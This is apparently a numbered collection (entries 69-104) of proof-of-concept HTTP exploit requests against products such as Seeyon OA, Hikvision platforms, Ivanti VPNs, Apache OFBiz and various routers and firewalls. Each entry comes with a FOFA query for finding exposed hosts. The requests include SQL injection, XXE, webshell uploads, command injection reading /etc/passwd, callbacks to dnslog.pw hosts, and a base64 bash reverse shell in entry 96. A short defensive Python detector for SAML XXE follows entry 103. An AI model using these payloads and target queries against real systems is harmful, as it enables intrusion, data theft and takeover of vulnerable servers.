Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) 掌上校园 campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese Tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin (奇安信) Legendsec (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload (the file name must match the one uploaded above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution (ProgramExport)
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
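Because the SAMLRequest parameter is only base64 (DEFLATE-compressed for the SAML HTTP-Redirect binding, plain for HTTP-POST as here), the XXE probe can be spotted before it ever reaches the XML parser by decoding the parameter and looking for a DOCTYPE that declares external entities. The Python below is an added example written for this page, not code from Ivanti or from the original post: it decodes the SAMLRequest shown in entry 103, extracts the parameter entity and the URI it would fetch, and returns a clean verdict for a constructed, entity-free AuthnRequest that is also not from the page.

```python
import base64
import re
import zlib
from urllib.parse import unquote

# The SAMLRequest value exactly as it appears in entry 103 above.
SAML_REQUEST_FROM_PAGE = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)

# Constructed, benign AuthnRequest used as the negative case (not from the page).
BENIGN_SAML_REQUEST = base64.b64encode(
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    b'ID="_constructed" Version="2.0" IssueInstant="2024-01-01T00:00:00Z"/>'
).decode()

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# Matches <!ENTITY [%] name SYSTEM "uri"> and <!ENTITY [%] name PUBLIC "id" "uri">.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.:-]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+'
    r'(?:"[^"]*"\s+)?"(?P<uri>[^"]*)"',
    re.I,
)


def decode_saml_request(value: str) -> str:
    """Return the XML carried by a SAMLRequest parameter.

    HTTP-POST binding sends plain base64; HTTP-Redirect binding DEFLATEs first,
    so a raw inflate is attempted when the decoded bytes do not look like XML.
    """
    raw = base64.b64decode(unquote(value))
    if not raw.lstrip().startswith(b"<"):
        try:
            raw = zlib.decompress(raw, -15)
        except zlib.error:
            pass
    return raw.decode("utf-8", errors="replace")


def find_external_entities(xml: str) -> list:
    """List every SYSTEM/PUBLIC entity declaration with the URI it would resolve."""
    found = []
    for m in ENTITY_RE.finditer(xml):
        found.append({
            "name": m["name"],
            "kind": m["kind"].upper(),
            "uri": m["uri"],
            "parameter": m["param"] is not None,  # '%' entities expand inside the DTD itself
        })
    return found


def inspect_saml_request(value: str) -> dict:
    """Verdict for one SAMLRequest value: any DOCTYPE or external entity is suspect."""
    xml = decode_saml_request(value)
    entities = find_external_entities(xml)
    has_doctype = DOCTYPE_RE.search(xml) is not None
    verdict = "xxe-suspect" if (has_doctype or entities) else "clean"
    return {"has_doctype": has_doctype, "entities": entities, "verdict": verdict}


if __name__ == "__main__":
    print(inspect_saml_request(SAML_REQUEST_FROM_PAGE))
    print(inspect_saml_request(BENIGN_SAML_REQUEST))
```

A legitimate AuthnRequest never needs a DOCTYPE, so blocking on `has_doctype` alone is safe for SAML endpoints; the entity extraction is what tells you where the callback would have gone.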


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
